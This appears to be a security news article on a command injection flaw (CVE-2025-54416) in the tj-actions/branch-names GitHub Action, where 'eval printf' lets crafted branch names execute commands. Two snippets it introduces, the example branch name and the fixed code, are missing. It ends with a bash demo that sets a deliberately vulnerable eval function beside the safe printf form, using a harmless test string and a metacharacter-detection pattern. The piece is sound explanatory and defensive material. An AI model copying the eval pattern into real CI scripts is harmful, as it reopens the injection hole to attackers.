A critical command injection vulnerability has been disclosed in the widely used GitHub Action tj-actions/branch-names, affecting over 5,000 public repositories. Assigned CVE-2025-54416 with a CVSS score of 9.1, the flaw allows arbitrary command execution in downstream workflows, placing countless automation pipelines at risk.
The branch-names GitHub Action is a workflow utility that retrieves branch and tag names during CI/CD operations. It’s often used to trigger tests, linting, or deployment workflows based on changed files or contextual information. However, its popularity has made it an attractive target for threat actors.
The vulnerability stems from the misuse of shell commands within the action's code. While printf "%q" was initially used to escape input, developers later unescaped the data using eval printf "%s", reintroducing the exact injection risk they had tried to prevent.
By using eval, any specially crafted branch name or tag can trigger command execution during CI workflows.
A demonstration of the flaw is presented in the advisory. An attacker could simply create a branch named:
Once a pull request is opened using this branch, the vulnerable action executes the embedded payload. This shows how attackers can execute remote scripts on GitHub-hosted runners, potentially stealing secrets or modifying source code.
Depending on repository configuration, an attacker exploiting this vulnerability could:
- Exfiltrate sensitive repository secrets
- Gain unauthorized write access
- Inject malicious code into releases or deployment pipelines
- Compromise CI/CD pipeline integrity
“The severity of the impact depends on the permissions granted to the GITHUB_TOKEN and the context of the triggering event,” the advisory explains.
This is particularly concerning in environments where pull requests automatically trigger privileged workflows.
To mitigate the issue, the action has now removed the use of eval entirely. Instead, output is written using safe and direct printf calls, which do not allow command injection:
This preserves shell safety while achieving the same functionality.
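To make the difference concrete, here is an added example (not the action's own code, and not taken from the advisory): a minimal reconstruction of the eval pattern described above next to the direct-printf form of the fix, plus a writer for the GITHUB_OUTPUT file that Actions steps use to publish outputs. The output names and the sample branch name are constructed for the demo.

```shell
#!/usr/bin/env bash
# Added example, not the action's own code: the eval pattern the advisory
# describes next to the direct-printf fix, plus a GITHUB_OUTPUT writer.
# Output names and the sample branch name are constructed for the demo.

# Vulnerable pattern (minimal reconstruction): eval re-parses the value,
# so $(...), backticks and ; in a branch name are executed, not printed.
unsafe_render() {
  eval printf '%s' "$1"
}

# Fixed pattern: the value is a printf argument only; nothing re-parses it.
safe_render() {
  printf '%s' "$1"
}

# Append NAME=VALUE to the step-output file the runner reads. Branch names
# cannot contain newlines (git forbids control characters in ref names),
# so the single-line form is sufficient here.
write_output() {
  printf '%s=%s\n' "$1" "$2" >> "${GITHUB_OUTPUT:?GITHUB_OUTPUT is not set}"
}

# Policy check (hypothetical) a downstream step could apply before reusing
# the value on a shell line: does the name contain characters a shell would
# interpret? Git permits these in ref names, so this flags risk, not invalidity.
has_shell_metachars() {
  printf '%s' "$1" | grep -q '[$`;|&<>()]'
}

demo() {
  GITHUB_OUTPUT="$(mktemp)"
  export GITHUB_OUTPUT
  branch='feature/$(echo injected)'   # constructed: a harmless substitution

  printf 'unsafe: %s\n' "$(unsafe_render "$branch")"   # feature/injected
  printf 'safe:   %s\n' "$(safe_render "$branch")"     # literal, unchanged

  write_output head_ref_branch "$branch"
  write_output is_default false
  cat "$GITHUB_OUTPUT"                  # the literal text, nothing executed
  if has_shell_metachars "$branch"; then
    printf 'note: branch name contains shell metacharacters\n'
  fi
  rm -f "$GITHUB_OUTPUT"
}
```

Call `demo` to see both renderings side by side; the unsafe line is the one a crafted branch name turns into command execution on the runner.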
Developers using the tj-actions/branch-names action should update their workflows to the latest major version, v9.